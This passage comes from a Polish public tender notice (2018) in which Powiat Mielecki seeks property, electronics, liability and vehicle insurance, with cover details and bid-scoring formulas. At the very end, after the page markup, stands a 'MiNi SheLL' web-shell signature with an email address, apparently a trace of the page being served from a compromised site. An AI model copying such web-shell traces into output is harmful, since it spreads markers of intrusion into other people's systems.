ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-02-09</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Otwarcie ofert nastąpi dnia 09.02.2018 r. o godzinie 10.30 w siedzibie Zamawiającego w Mielcu przy ul. Wyspiańskiego 6 - pokój nr 220.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>UBEZPIECZENIE MIENIA OD WSZYSTKICH RYZYK, UBEZPIECZENIE SPRZĘTU ELEKTRONICZNEGO OD WSZYSTKICH RYZYK, UBEZPIECZENIE ODPOWIEDZIALNOŚCI CYWILNEJ W ZWIĄZKU Z PROWADZONĄ DZIAŁALNOSCIĄ I POSIADANYM MIENIEM</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Szczegółowy opis Przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ, którą Zamawiający udostępnia na swojej stronie internetowej.Przedmiot zamówienia obejmuje: I. UBEZPIECZENIE MIENIA OD WSZYSTKICH RYZYK1. PRZEDMIOT UBEZPIECZENIAOchroną ubezpieczeniową w ramach ubezpieczenia mienia od ognia i innych zdarzeń losowychobjęte będą środki trwałe (bez względu na wiek, stopień umorzenia/amortyzacji itechnicznego/faktycznego zużycia) z wyłączeniem elektroniki zgłoszonej do ubezpieczenia sprzętuelektronicznego oraz pojazdów ubezpieczanych w ramach ryzyka Auto Casco oraz niskocenneśrodki trwałe, środki obrotowe, nakłady inwestycyjne oraz wartości pieniężne stanowiącewłasność lub będące w posiadaniu wskazanych jednostek organizacyjnych Powiatu Mieleckiego.Bez względu na odmienne postanowienia ogólnych warunków ubezpieczenia ochronąubezpieczeniową zostaną objęte: sieci elektroenergetyczne oraz inne przyłącza związane z funkcjonowaniem obiektu tj. m.in.zamontowane w budynkach linie kablowe, światłowodowe, telekomunikacyjne, elektrycznewraz ze stacjami transformatorowo - rozdzielczymi, oraz linie naziemne, podziemne i ichwyposażenie, jeżeli służą wyłącznie zaspokojeniu potrzeb Ubezpieczonego w ramachprowadzonej działalności i stanowią jego własność oraz zlokalizowane są na terenie będącymw jego posiadaniu, z zastrzeżeniem iż z ochrony wyłączone zostaną wszelkie linietransmisyjne i dystrybucyjne z włączeniem przewodów, kabli, słupów, wież i wszelkiegorodzaju sprzęt, który może być połączony z tymi instalacjami, włączając wszelkiego rodzajupodstacje, znajdujące się w odległości większej niż 100m od ubezpieczonych budynków ibudowli". ogrodzenia i bramy, chodniki i drogi wewnętrzne, schody, boiska sportowei place zabaw wraz z instalowanym wyposażeniem (infrastrukturą), pomosty nad jeziorem,siłownie na wolnym powietrzu, altany, wiaty rowerowe, pylony promocyjne, dźwigi osobowe, obiekty małej architektury w tym pomniki, rzeźby, kompozycje przestrzenne, elementyinfrastruktury (w tym punkty informacyjne, pionowe oznakowanie dróg, tablice z nazwamiulic), instalacje służące do podniesienia bezpieczeństwa, sygnalizacja świetlna z infrastrukturątowarzyszącą, słupy oświetleniowe, zbiory biblioteczne, księgozbiory, archiwa, dokumenty, wiaty i słupy przystankowe, urządzenia i wyposażenia zewnętrzne na terenie Powiatu Mieleckiego np.: siłowniki bram,hydranty, pojemniki na surowce wtórne i kosze).2. ZAKRES OCHRONY. ZAKRES TERYTORIALNY2.1 Ochroną objęte zostają wszystkie ryzyka za wyjątkiem wyraźnie wyłączonych w OgólnychWarunkach Ubezpieczenia.2.2 Zakres terytorialny - ubezpieczone mienie objęte jest ochroną ubezpieczeniową w każdymmiejscu w którym w danej chwili się znajduje2.3 Obowiązek wykazania, że szkoda nie jest objęta ochroną ubezpieczeniową spoczywa naUbezpieczycielu.2.4 Ochrona obejmuje w szczególności szkody wyrządzone przez:o pożar - również bez widocznego płomienia,o kradzież z włamaniem i rabunek; dewastację,o eksplozje wszystkich rodzajów, implozje,o uderzenia pioruna,o napór śniegu lub lodu,o upadek pojazdu powietrznego,o wodę bieżącą, powódź, zalanie, podniesienie się poziomu wody, opady deszczowe, deszcznawalny, mróz, płyny innego rodzaju, wichurę (17,5 m/s), grad, lawinę, spadnięcie skał,o uderzenie pojazdu w ubezpieczone mienie (w tym pojazdu należącego do ubezpieczonegolub jego pracowników)- bez ograniczenia limitu odpowiedzialności,o huk ponaddźwiękowy, zanieczyszczenie lub skażenie ubezpieczonego mieniaw wyniku zdarzeń losowych objętych umową ubezpieczenia;o działanie prądu elektrycznego, przepięcie (zgodnie z treścia Klauzuli EIB 02);o zalanie w wyniku topnienia śniegu, lodu, również zalegającego na dachach lub innychelementach,o akcję ratowniczą, wyburzanie, odgruzowywanie prowadzone w związku ze zdarzeniamiobjętymi zakresem ubezpieczenia;o zanieczyszczenie lub skażenie spowodowane zdarzeniami objętymi zakresemubezpieczenia;o inne ryzyka dodatkowe wynikające z Ogólnych Warunków Ubezpieczenia.II. UBEZPIECZENIE SPRZĘTU ELEKTRONICZNEGO OD WSZYSTKICH RYZYK1. Przedmiot ubezpieczeniaWybrany sprzęt elektroniczny będący w posiadaniu lub użytkowaniu poszczególnych jednostekUbezpieczonego, bez względu na wiek, stopień umorzenia/amortyzacji i technicznego/faktycznego zużyciaoraz, niezależnie czy Ubezpieczony był w posiadaniu mienia w chwili zawarcia umowy czy też mieniezostało nabyte w okresie ubezpieczenia.Sumy ubezpieczenia podane - Tabela nr 4.2. Zakres ubezpieczenia2.1. Ubezpieczenie zawarte w systemie ,,all risks" - ochroną objęte zostają wszystkie ryzyka zawyjątkiem wyraźnie wyłączonych w Ogólnych Warunkach Ubezpieczenia. Sprzęt elektroniczny jestobjęty ochroną ubezpieczeniową od wszelkich szkód materialnych (fizycznych) polegających nautracie przedmiotu ubezpieczenia, jego uszkodzeniu lub zniszczeniu wskutek nieprzewidzianej iniezależnej od Ubezpieczającego przyczyny, a w szczególności spowodowanych przez: działanie człowieka, tj.: niewłaściwe użytkowanie, nieostrożność, zaniedbanie, błędnąobsługę, świadome i celowe zniszczenie przez osoby trzecie; upadek (upuszczenie), akcję ratunkową (np: gaszenie, burzenie, oczyszczanie zgliszcz); działanie ognia, w tym pożar bez widocznego płomienia, działanie dymu i sadzy orazosmalenie, przypalenie, wszelkiego rodzaju eksplozje, implozje, uderzenie pioruna, upadek statku powietrznego lub jego części, działanie wody i wilgoci tj. wszelkie zalania, w tym zalania z urządzeń wodno -kanalizacyjnych, burzę, powódź, sztorm, wylew wód podziemnych, podtopienie, deszcznawalny, parę wodną i ciecze w innej postaci oraz działanie mrozu, gradu, śniegu, działanie wiatru, w tym huraganu, lawiny, osunięcie się ziemi, spadnięcie skał wady/błędy produkcyjne, konstrukcyjne, materiałowe, pośrednie działanie wyładowań atmosferycznych i zjawisk pochodnych, tj. działanie polaelektromagnetycznego, indukcji, itp.; szkody elektryczne, w tym w szczególności przepięcie, indukcję, wzrost/spadek/zaniknapięcia, zwarcie, przetężenie, uszkodzenie izolacji, niezadziałanie zabezpieczeń itp., kradzież z włamaniem lub rabunek, kradzież sprzętu elektronicznego z pojazdu, jak również utrata sprzętu elektronicznegoznajdującego się w pojeździe spowodowana utratą tego pojazdu, kradzież zwykłA (bez śladów włamania) dla każdego rodzaju mienia zgłoszonego doubezpieczenia do limitu 10.000,00zł pod warunkiem, że Ubezpieczony zawiadomi o tymfakcie policję po stwierdzeniu szkody spowodowanej kradzieżą; w zakresie ryzyka kradzieży ochrona ubezpieczeniowa obejmuje także mienie zainstalowanena wewnątrz i na zewnątrz budynków /elementy systemów alarmowych czy monitoringu/ , o ile mienie to, zgodnie z obowiązującymi przepisami oraz wytycznymiproducenta/dostawcy/gwaranta, przystosowane jest do użytkowania wewnątrz/ na zewnątrzbudynków oraz przedmioty zamocowane do budynku wraz z ich konstrukcjamiwspornikowymi są zainstalowane i zabezpieczone w taki sposób, aby ich wymontowanie niebyło możliwe bez użycia siły lub narzędzi. Limit odpowiedzialności w wysokości 20 000 PLNna jedno i wszystkie zdarzenia w okresie ubezpieczenia.2.2. Zakres terytorialny ubezpieczenia obejmuje wszelkie miejsca, gdzie znajduje się ubezpieczonemienie, w tym szkody w sprzęcie używanym przez Ubezpieczającego lub jego pracowników pozalokalizacjami Ubezpieczającego oraz podczas podróży zagranicznych: dla sprzętu przenośnego - Europa, dla pozostałego sprzętu - teren RP zgodnie z KLAUZULĄ EIB 21A.2.3. Sprzęt przenośny objęty jest ochroną podczas transportu wszelkimi środkami komunikacji(transport lądowy, powietrzny i wodny).2.4. Dane są objęte ochroną na terenie RP, także w zewnętrznym archiwum danych oraz podczastransportu między miejscem gromadzenia danych a zewnętrznym archiwum danych.2.5. w zakresie ryzyka kradzieży ochrona ubezpieczeniowa obejmuje także mienie zainstalowane nawewnątrz i na zewnątrz budynków /elementy systemów alarmowych czy monitoringu/ , o ilemienie to, zgodnie z obowiązującymi przepisami oraz wytycznymi producenta/dostawcy/gwaranta,przystosowane jest do użytkowania wewnątrz/ na zewnątrz budynków oraz przedmiotyzamocowane do budynku wraz z ich konstrukcjami wspornikowymi są zainstalowane izabezpieczone w taki sposób, aby ich wymontowanie nie było możliwe bez użycia siły lub narzędzi.Limit odpowiedzialności w wysokości 20 000 PLN na jedno i wszystkie zdarzenia w okresieubezpieczenia.III. UBEZPIECZENIE ODPOWIEDZIALNOŚCI CYWILNEJ W ZWIĄZKU ZPROWADZONA DZIAŁALNOSCIĄ I POSIADANYM MIENIEM1. Przedmiot i zakres ubezpieczenia1.1 Ubezpieczeniem objęta będzie odpowiedzialność cywilna Ubezpieczającego / Ubezpieczonegowynikająca z obowiązujących przepisów prawa z tytułu faktycznie prowadzonej działalności, w tymgospodarczej i/lub z tytułu posiadania mienia bez względu na jego rodzaj i przeznaczenie.Postanowienia ogólnych warunków ubezpieczenia odnoszące się do zdefiniowanej w umowieubezpieczenia działalności nie mogą stanowić podstawy od uchylenia się od spełnienia świadczenia,do którego Ubezpieczyciel zobowiązany jest na mocy niniejszej umowy ubezpieczenia.1.2 Ubezpieczeniem objęta będzie także odpowiedzialność cywilna z tytułu prowadzenia działalnościinnej niż gospodarcza, w tym socjalna, kulturalna, rekreacyjna, sportowa oraz wszelkie inneprzejawy aktywności Ubezpieczonego.2. ZAKRES OCHRONY. ZAKRES TERYTORIALNY2.1 Zakres ochrony ubezpieczeniowej obejmuje odpowiedzialność cywilną deliktową Ubezpieczonego, atakże odpowiedzialność cywilną za szkody wynikłe z niewykonania lub nienależytego wykonaniazobowiązania (odpowiedzialność cywilna kontraktowa).2.2 Zakres ubezpieczenia obejmuje odpowiedzialność za szkody w postaci strat rzeczywistych(damnum emergens), utraconych korzyści, jakie poszkodowany odniósłby, gdyby mu szkody niewyrządzono (lucrum cessans), a także należne zadośćuczynienie, o ile wynika ze szkody osobowejbez względu na odmienne postanowienia ogólnych lub szczególnych warunków ubezpieczenia.2.3 Zakres ubezpieczenia obejmuje szkody wyrządzone wskutek rażącego niedbalstwa.2.4 Zakres terytorialny ubezpieczenia obejmuje wypadki ubezpieczeniowe, powstałe w działania bądźzaniechania Ubezpieczonego, które miało miejsce na terytorium RP. W odniesieniu do szkód wwyniku wypadków (ubezpieczeniowych) powstałych w związku ze służbowymi podróżamipracowników Ubezpieczającego lub Ubezpieczonego zakres terytorialny obejmuje cały świat.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>66510000-8, 66515400-7, 66515000-3, 66516000-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2018-02-23<br/>data zakończenia: 2020-02-22<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena (składka ubezpieczeniowa)</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">warunki ubezpieczenia</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1.1.	Punktacja ofert w ramach Części 01 Zamówienia.1.1.1.	Kryterium Cena (składka ubezpieczeniowa): Oferty będą oceniane na podstawie ceny podanej w formularzu i obliczane wg poniższego wzoru:Pc = 100 pkt x ( Cn / Co) x 95% Pc - liczba punktów przyznanych rozpatrywanej ofercieCn- najniższa zaoferowana cena Co- cena rozpatrywanej oferty1.1.2.	Kryterium Warunki ubezpieczenia: Oferty będą oceniane z uwzględnieniem poniższych kryteriów punktowych zależnych od akceptacji przez Wykonawcę poszczególnych klauzul fakultatywnych.Klauzula katastrofy budowlanej z limitem 5 000 000,00 zł	//0 pkt - brak akceptacji////100 pkt - akceptacja//Przyznane punkty za akceptację poszczególnych klauzul fakultatywnych zostaną zsumowane, a ogólna wartość punktowa obliczana będzie wg wzoru:Pw = Wo x 5%Pw - liczba punktów w kryterium warunki ubezpieczeniaWo - punkty przyznane za kryterium warunki ubezpieczenia1.1.3.	Łączna ilość punktów przyznana ocenianej ofercie wyliczona będzie wg następującego wzoru:P = Pc + Pw1.1.4.	Zamawiający uzna za najkorzystniejszą ofertę tę, która uzyska najwyższą liczbę punktów uzyskanych w wyniku zsumowania punktów w kryterium ,,cena" i kryterium ,,warunki ubezpieczenia".<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>UBEZPIECZENIA KOMUNIKACYJNE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ, którą Zamawiający udostępnia na swojej stronie internetowej.UBEZPIECZENIA KOMUNIKACYJNEPrzedmiot zamówienia obejmuje ubezpieczenia dlaryzyk związanych z posiadaniem i użytkowaniem pojazdów mechanicznych (dalej pojazdy),stanowiących flotę Ubezpieczającego. W zakres przedmiotu zamówienia wchodzą pojazdy, którew czasie obowiązywania Umowy stanowią własność lub są użytkowane na podstawie tytułuprawnego, innego niż prawo własności (jako przedmiot umowy leasingu, najmu, dzierżawy).Wykaz pojazdów stanowiących flotę Ubezpieczającego zawiera Załącznik Nr 5 do SIWZ. Załącznikten uwzględnia wnioskowany rodzaj ubezpieczenia dla poszczególnego pojazdu. Załączony wykazpojazdów zostanie uaktualniony przed zawarciem Umowy.Pojazdy zgłaszane do ubezpieczenia w czasie trwania niniejszej Umowy zostaną objęte ochronąna niniejszych warunkach na podstawie zgłoszenia przez Ubezpieczającego.1. Obowiązkowe ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdówmechanicznycho Przedmiotem ubezpieczenia OC jest odpowiedzialność cywilna posiadaczy pojazdówmechanicznych za szkody powstałe w związku z ruchem pojazdów, zgodnie z załączonymwykazem pojazdów znajdującym się w Załączniku nr 5 do SIWZ.o Ubezpieczenie OC - zakres i warunki ubezpieczenia zgodnie z ustawą z dn. 22 maja 2003 r.o ubezpieczeniach obowiązkowych, Ubezpieczeniowym Funduszu Gwarancyjnym i Polskim BiurzeUbezpieczycieli Komunikacyjnych (Dz. U. Nr 124 Poz. 1152 wraz z poźniejszymi zmianami) (dalejustawa o ubezpieczeniach obowiązkowych).o Suma gwarancyjna: zgodnie z art. 36 ust. 1 ustawy o ubezpieczeniach obowiązkowych.o Ubezpieczyciel obowiązany jest podać ryczałtową wysokość składki za pojazd, z uwzględnieniemrodzaju pojazdu, za dwunastomiesięczny okres ubezpieczenia.2. Ubezpieczenie Autocascoo Przedmiotem ubezpieczenia AC są zgłoszone pojazdy wraz z wyposażeniem (w tymwyposażeniem dodatkowym lub specjalistycznym zamontowanym na stałe w pojeździe jeślizostało zgłoszone do ubezpieczenia), podlegające -- stosownie do przepisów prawa o ruchudrogowym -- rejestracji w RP oraz inne pojazdy napędzane silnikiem z własnego źródła energii,stanowiące własność, będące w posiadaniu lub użytkowaniu Ubezpieczającego.o Ubezpieczenie zawarte w systemie ,,all risk" - ochroną ubezpieczeniową objęte zostaną wszelkieszkody polegające na uszkodzeniu, zniszczeniu lub kradzieży pojazdu wraz z przyjętym doubezpieczenia wyposażeniem, wskutek zdarzeń niezależnych od woli Ubezpieczonego lub osobyuprawnionej do korzystania z pojazdu.o Zakres ubezpieczenia: Ubezpieczenie pojazdów od uszkodzeń w ruchu i postoju Auto-casco (AC)rozszerzone o ryzyko kradzieży (KR).o ubezpieczyciel odpowiada również za szkody nie będące wynikiem rażącego niedbalstwa czyspowodowane umyślnie, a powstałe wskutek:- powstałe w pojeździe przez przewożony ładunek lub bagaż;- powstałe w wyniku samoczynnego stoczenia się pojazdu na terenie pochyłym;- powstałe w wyniku dostania się wody do wnętrza pojazdu;- powstałe podczas podnoszenia pojazdu w celu dokonania naprawy;- będące wynikiem wjechania w nierówność drogi;- spowodowane nagłym działaniem sił mechanicznych, czynników termicznych lubchemicznych pochodzących z zewnątrz jak i wewnątrz pojazdu,- ubezpieczeniem objęte są szkody polegające na uszkodzeniu pojazdu, części lubwyposażeniaw następstwie jego zabrania w celu krótkotrwałego użycia.o Ubezpieczyciel odpowiada za szkody wyrządzone między pojazdami floty należącej doUbezpieczającego.3. Ubezpieczenie następstw nieszczęśliwych wypadków powstałych w związku z ruchempojazdów mechanicznycho Ubezpieczeniem objęte są następstwa nieszczęśliwych wypadków polegające na uszkodzeniuciała, rozstroju zdrowia powodujące uszczerbek na zdrowiu lub śmierć ubezpieczonego (kierowcy,pasażerów) powstałe w związku z ruchem pojazdu. Ubezpieczenie obejmuje w szczególności NNWpowstałe: podczas wsiadania lub wysiadania, przebywania w pojeździe w czasie zatrzymania lubpostoju, przy załadowywaniu lub rozładowywaniu pojazdu, w czasie naprawy pojazdu, podczasgarażowania, jak również NNW będące następstwem zdarzeń losowych w szczególności pożaru,wybuchu lub upadku pojazdu, a także trwałe następstwa zawału serca lub krwotokuśródmózgowego powstałe u kierowcy lub pasażerów w związku ze zdarzeniami objętymi ochroną.o Ochrona ubezpieczeniowa obejmuje następstwa nieszczęśliwych wypadków powstałych naterytorium Europy.o Górną granicę odpowiedzialności w razie śmierci ubezpieczonego wskutek nieszczęśliwegowypadku stanowi kwota odpowiadająca 100% sumy ubezpieczenia, trwałego uszczerbku nazdrowiu (100% sumy ubezpieczenia), trwałego uszczerbku częściowego (1% sumy ubezpieczeniaza 1% uszczerbku), naprawy lub nabycia protez i środków pomocniczych (do limitu 1.000,00zł),zwrotu udokumentowanych kosztów leczenia (do 10% sumy ubezpieczenia).o Suma ubezpieczenia w systemie na miejsce w pojeździe, bez względu na ilość miejsc, wynosi10.000,00 zł.4. Ubezpieczenie Assistanceo Wszystkie pojazdy objęte ubezpieczeniem OC i spełniające kryterium rodzaju pojazduokreślonego w punkcie poniższym objęte będą ubezpieczeniem Assistance w warianciepodstawowym (ubezpieczenie bezskładkowe) zawierającym, co najmniej holowanie pojazdu lubjeśli to jest możliwe naprawę na miejscu, umożliwiającą poruszanie się pojazdem, bez względu namiejsce awarii lub zdarzenia. Ubezpieczeniem Assistance w wariancie rozszerzonym będąubezpieczone pojazdy wskazane przez Ubezpieczającego.o Ubezpieczeniem objęte są następujące rodzaje pojazdów: samochody osobowe, ciężarowew nadwoziu osobowym, ciężarowe i ciężarowo osobowe o ładowności do 2 ton.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>66510000-8, 66516100-1, 66514110-0, 66512100-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2018-02-23<br/>data zakończenia: 2020-02-22<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena (składka ubezpieczeniowa)</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">warunki ubezpieczenia</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1.1.	Punktacja ofert w ramach Części 02 zamówienia.1.1.1.	Kryterium Cena (składka ubezpieczeniowa): Oferty będą oceniane na podstawie ceny podanej w formularzu i obliczane wg poniższego wzoru:Pc = 100 pkt x ( Cn / Co) x 95% Pc - liczba punktów przyznanych rozpatrywanej ofercieCn- najniższa zaoferowana cena Co- cena rozpatrywanej oferty1.1.2.	Kryterium Warunki ubezpieczenia: Oferty będą oceniane z uwzględnieniem poniższych kryteriów punktowych zależnych od akceptacji przez Wykonawcę klauzuli fakultatywnej.Gwarantowana suma ubezpieczenia w ubezpieczeniu auto - casco	//0 pkt - brak akceptacji////100 pkt - akceptacja//Przyznane punkty za akceptację poszczególnych klauzul fakultatywnych zostaną zsumowane, a ogólna wartość punktowa obliczana będzie wg wzoru:Pw = Wo x 5%Pw - liczba punktów w kryterium warunki ubezpieczeniaWo - punkty przyznane za kryterium warunki ubezpieczenia1.2.3.	Łączna ilość punktów przyznana ocenianej ofercie.Łączna ilość punktów przyznana ocenianej ofercie wyliczona będzie wg następującego wzoru:P = Pc + Pw1.2.4.	Zamawiający uzna za najkorzystniejszą ofertę tę, która uzyska najwyższą liczbę punktów uzyskanych w wyniku zsumowania punktów w kryterium ,,cena" i kryterium ,,warunki ubezpieczenia".<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com